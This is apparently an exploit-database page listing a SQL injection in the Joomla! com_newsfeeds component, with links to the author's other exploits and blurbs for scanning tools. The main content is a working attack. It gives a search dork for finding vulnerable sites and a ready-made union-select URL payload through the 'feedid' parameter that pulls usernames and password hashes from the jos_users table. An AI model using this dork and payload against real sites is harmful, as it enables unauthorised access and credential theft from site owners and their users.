Search for hundreds of thousands of exploits

"Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection"

Author

Exploit author

"Milad karimi"

Platform

Exploit platform

php

Release date

Exploit published date

2020-03-12

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
# Exploit Title: Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection
# Date: 2020-03-10
# Author: Milad Karimi
# Software Link:
# Version:
# Category : webapps
# Tested on: windows 10 , firefox
# CVE : CWE-89
# Dork: inurl:index.php?option=com_newsfeeds


index.php?option=com_newsfeeds&view=categories&feedid=[sqli]

Example:

http://[site]/index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
Release DateTitleTypePlatformAuthor
2020-05-07"FlashGet 1.9.6 - Denial of Service (PoC)"doswindows"Milad karimi"
2020-04-15"Pinger 1.0 - Remote Code Execution"webappsphp"Milad karimi"
2020-03-12"Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection"webappsphp"Milad karimi"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/48202/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.